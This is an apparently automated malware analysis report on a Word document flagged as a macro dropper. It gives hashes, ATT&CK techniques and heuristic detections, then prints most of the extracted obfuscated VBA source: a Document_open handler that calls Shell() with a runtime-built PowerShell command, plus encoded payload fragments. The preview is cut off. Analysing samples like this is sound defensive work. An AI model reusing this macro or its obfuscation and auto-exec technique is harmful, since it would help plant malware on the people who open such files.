Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d754f4a82eb9429d…

MALICIOUS

Office (OLE)

Size: 114.2 KB
Created: 2018-06-13 21:11:00
Authoring application: Microsoft Office Word
First seen: 2018-11-05
MD5: 911829a3ed960313a982b223fe41e439
SHA-1: f5fbac0fd9af8baff3e62f570e3f9120316a6018
SHA-256: d754f4a82eb9429dcaad1b8e2e7b8339df1ed708fd193b07e51eb3dd39197f29
Risk score: 222

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample is a malicious Office (Word) document containing VBA macros. Its Document_open auto-execution handler calls the function qYECDJVzi, which invokes VBA.Shell() with a command string assembled at runtime from string fragments and Chr() calls; this is what the OLE_VBA_SHELL and OLE_VBA_PCODE_AUTOEXEC_EXEC heuristics flag. The ClamAV detection name 'Doc.Dropper.Agent-6589611-0' indicates a dropper, i.e. a document whose purpose is to retrieve and execute a secondary payload. The VBA source is heavily obfuscated with junk arithmetic on undefined variables (Tan(), Log(), Rnd(), CDbl() under On Error Resume Next), but a Shell() call reached from an auto-exec macro is a clear indicator of malicious intent.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6618075-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6618075-0
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • Document_Open macro [high] (OLE_VBA_DOCOPEN)
    Document_Open macro
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11913 bytes
SHA-256: 806b6ac6a9f6e95cd33bcc11b732cfcce821a6a0f864f212b35d9340434eda1e

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "HrotVrdd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function qYECDJVzi()
On Error Resume Next
rdSYFj = MUzvuD
ajLInv = Tan(71383)
mUzbOz = CDbl(zZnohW * CDbl(jfGzN + Int(PNrIDU * Rnd(75886)) * YPMOl * Log(82358 * rKLjnq - EfkXKR + Fix(51))))
prwjRT = Tan(48743)
UuQavX = LYfKW
oXuKob = CDbl(aavfT)
OWomd = QvFKc
iYOhU = Tan(44741)
wlVzhG = CDbl(vQRQr * CDbl(nQtkLs + Int(IvdwFi * Rnd(93319)) * HNGODf * Log(46009 * Najawb - zFwCp + Fix(51))))
WKtRBV = Tan(4702)
fKiScj = jsJcGI
WrDKc = CDbl(DKCoEP)
jdQVnD = DHzZGq
DNwBKV = Tan(59719)
OzYoN = CDbl(ihbDTD * CDbl(zFmuu + Int(pbBBHt * Rnd(72338)) * oCijBu * Log(5784 * zdVIEL - CMBkD + Fix(51))))
wUDfGB = Tan(47607)
IJZmud = zoFJiG
zRvbf = CDbl(fwWSJz)
LZjZVV = qjbGp
haBvsi = Tan(72633)
KitMXw = CDbl(IMmtZ * CDbl(zVUXQS + Int(JzzFV * Rnd(15943)) * twVib * Log(31706 * XwIiV - Yqznmz + Fix(51))))
XkVMK = Tan(75980)
aYMovn = SwMSWm
jMinqP = CDbl(UKqERJ)
qYECDJVzi = dwakitU + VBA.Shell(nYikFiCo + Chr(KYOXisO + vbKeyP + jiQXDKVPj) + "owers" + hUMrYzk + DQhSDljvmoR + KhzDtEKMFr + UaQapXtui, 17010 - 17010)
RVsGl = jJjVq
JcIXoo = Tan(40134)
zLJYP = CDbl(nNOSU * CDbl(cNLhh + Int(dUdQHr * Rnd(91225)) * Blmodz * Log(61530 * jzTkH - AHvzAY + Fix(51))))
XswcCr = Tan(41091)
iNOwZ = UWUHqW
hESdaw = CDbl(bZpXn)
WBtBH = pzfVJd
dtnMa = Tan(10585)
Qtikfd = CDbl(BWMwb * CDbl(OUIoN + Int(RdrcU * Rnd(24534)) * rzUrww * Log(24351 * vkOChz - JzozZ + Fix(51))))
SUqqI = Tan(90285)
UTkum = QOTroX
HYQKY = CDbl(lCjfOw)
End Function
Private Sub Document_open()
On Error Resume Next
iXTDd = MAcTaw
oZfiAq = Tan(6159)
jzjwE = CDbl(dznjcn * CDbl(ALXCfX + Int(OqwRqI * Rnd(76237)) * OqXNY * Log(56051 * avhwN - CqqrQ + Fix(51))))
rBdaoC = Tan(7154)
rlbUi = VLzFZ
pDSGvo = CDbl(iwIOP)
hTWdb = YzUuh
PvDlQi = Tan(21419)
AlAPBG = CDbl(shjqz * CDbl(fjtWzj + Int(DuaYO * Rnd(95510)) * ilWrFY * Log(95333 * dvnjK - SmzcZk + Fix(51))))
UfdWNH = Tan(47576)
FCziNW = kIcvoM
LbBEN = CDbl(GLskY)
qYECDJVzi
STlfz = LaFsA
OFsVsR = Tan(47764)
pRiuIr = CDbl(nzjjM * CDbl(PJBSWs + Int(Wljdz * Rnd(66524)) * rZhWC * Log(77241 * HwXwM - GkWjn + Fix(51))))
nhwKI = Tan(67060)
YUIMdU = rBlPA
sTDhE = CDbl(aSSOQM)
vCDPT = mioWG
XurvOZ = Tan(75936)
JASYk = CDbl(oYIrio * CDbl(NZfaXA + Int(ZadSEz * Rnd(20468)) * XJNPJ * Log(58379 * WbSLhl - uDUPh + Fix(51))))
bHIQV = Tan(28961)
jCDHL = GKjZz
jXAUnV = CDbl(AziTf)
End Sub


Attribute VB_Name = "PEqQAwtuhzzaw"
Function hUMrYzk()
On Error Resume Next
uzdHU = Tan(8539)
zWCfCa = Tan(49319)
MwZqzs = XOmED
iKNrkW = CDbl(njhtJr * CDbl(KPdQwE + Int(jKFZR * Rnd(59846)) * qCAOr * Log(19622 * MpnSD - sSYBVD + Fix(51))))
CzHST = CDbl(KwihfS)
wGvivw = OGXQI
VdBJTOLqVYh = "HeLL  (" + "'30t92C83F12" + "0%92K1" + "20t2" + "6A7K2" + "6t84C" + "95m77F23C8"
tizpi = Tan(4230)
KiqZs = Tan(88863)
ONjzp = FSiGX
VIvZm = CDbl(bqznN * CDbl(OFhjG + Int(olfuz * Rnd(73556)) * Vwjjca * Log(91450 * ArBjQm - Swnazi + Fix(51))))
YbKJiR = CDbl(vGWMR)
nOMiUz = fvnqW
YlzKHawhzB = "5m88u80A95<" + "89" + "F78G26m72m91" + "%84m9" + "4F85G87C1u" + "30F119C" + "64A74G98A78G26" + "K7t26A84m95u77u" + "23t85%88m80" + "K95u89F78F26A10"
OTSiT = Tan(64524)
NPECjn = Tan(85868)
Qchop = qcuzBn
JrjzCz = CDbl(zSpUn * CDbl(UBFsW + Int(UYYmzq * Rnd(44393)) * zjusq * Log(18850 * EYYEh - dwimvC + Fix(51))))
JkFjHf = CDbl(RQXzid)
wcQqZi = YXpQN
iwCzlFMfKL = "5A67%73G78" + "A95%87K20K116" + "F95G78t" + "20t109m9" + "5m88<" + "121C86m83<" + "95u84G78K1F3" + "0K83C112K94m121"
rsZcwR = Tan(92002)
siNPZ = Tan(16533)
iGAai = zzHTuk
Zmzrl = CDbl(dlChpF * CDbl(ULBnDI + Int(VNVzI * Rnd(84423)) * mBiwoK * Log(68670 * humcZ - WNOdOH + Fix(51))))
QAitz = CDbl(kYlBvw)
vTTpz = tMfGp
jIBszarD = "G89G26m7<26F2" + "9G82%78u7" + "8<74m0<2" + "1<21G83K95m86C" + "95<78m" + "72F8" + "5<84m20G89<"
oGLWM = Tan(33044)
uJETq = Tan(86964)
LiuPDo = kzTOIw
XMlZ
... (truncated)